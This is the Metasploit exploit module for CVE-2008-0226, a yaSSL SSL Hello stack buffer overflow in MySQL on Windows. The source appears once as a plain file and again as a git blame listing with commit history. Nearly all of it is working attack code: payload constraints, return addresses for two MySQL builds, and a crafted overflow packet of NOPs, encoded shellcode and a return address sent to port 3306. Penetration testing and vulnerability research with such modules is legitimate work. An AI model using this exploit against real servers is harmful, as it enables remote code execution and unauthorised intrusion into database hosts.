metasploit-framework/modules/exploits/windows/mysql/mysql_yassl_hello.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MySQL yaSSL SSL Hello Message Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)
        implementation bundled with MySQL <= 6.0. By sending a specially crafted
        Hello packet, an attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-0226' ],
          [ 'OSVDB', '41195'],
          [ 'BID', '27140' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MySQL 5.0.45-community-nt',    { 'Ret' => 0x008b9d45 } ],
          [ 'MySQL 5.1.22-rc-community',    { 'Ret' => 0x008b04c9 } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 4 2008'))

    register_options([ Opt::RPORT(3306) ], self)
  end

  def exploit
    connect

    sock.get_once

    req_uno =  [0x01000020].pack('V')

    req_dos =  [0x00008daa].pack('V') + [0x40000000].pack('V')
    req_dos << [0x00000008].pack('V') + [0x00000000].pack('V')
    req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
    req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
    req_dos << [0x03010000].pack('V') + [0x00000001].pack('V')
    req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length)
    req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V')
    req_dos << make_nops(16) + [0xe8, -650].pack('CV') + rand_text_alphanumeric(1024)

    print_status("Trying target #{target.name}...")

    sock.put(req_uno)
    sock.put(req_dos)

    handler
    disconnect
  end
end
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = AverageRanking`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'MySQL yaSSL SSL Hello Message Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)`
			`implementation bundled with MySQL <= 6.0. By sending a specially crafted`
			`Hello packet, an attacker may be able to execute arbitrary code.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2008-0226' ],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '41195'],`
Retab modules 2013-08-30 21:28:54 +00:00			`[ 'BID', '27140' ],`
			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 600,`
			`'BadChars' => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`
			`'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ],`
			`[ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ],`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jan 4 2008'))`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options([ Opt::RPORT(3306) ], self)`
			`end`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`connect`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sock.get_once`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`req_uno = [0x01000020].pack('V')`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`req_dos = [0x00008daa].pack('V') + [0x40000000].pack('V')`
			`req_dos << [0x00000008].pack('V') + [0x00000000].pack('V')`
			`req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')`
			`req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')`
			`req_dos << [0x03010000].pack('V') + [0x00000001].pack('V')`
			`req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length)`
			`req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V')`
			`req_dos << make_nops(16) + [0xe8, -650].pack('CV') + rand_text_alphanumeric(1024)`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Trying target #{target.name}...")`
added exploit modules mysql_yassl(win32/linux) and realplayer_console from EB. git-svn-id: file:///home/svn/framework3/trunk@5463 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-01 11:22:32 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sock.put(req_uno)`
			`sock.put(req_dos)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`disconnect`
			`end`
OSVDB references updates from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6812 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-16 16:02:24 +00:00			`end`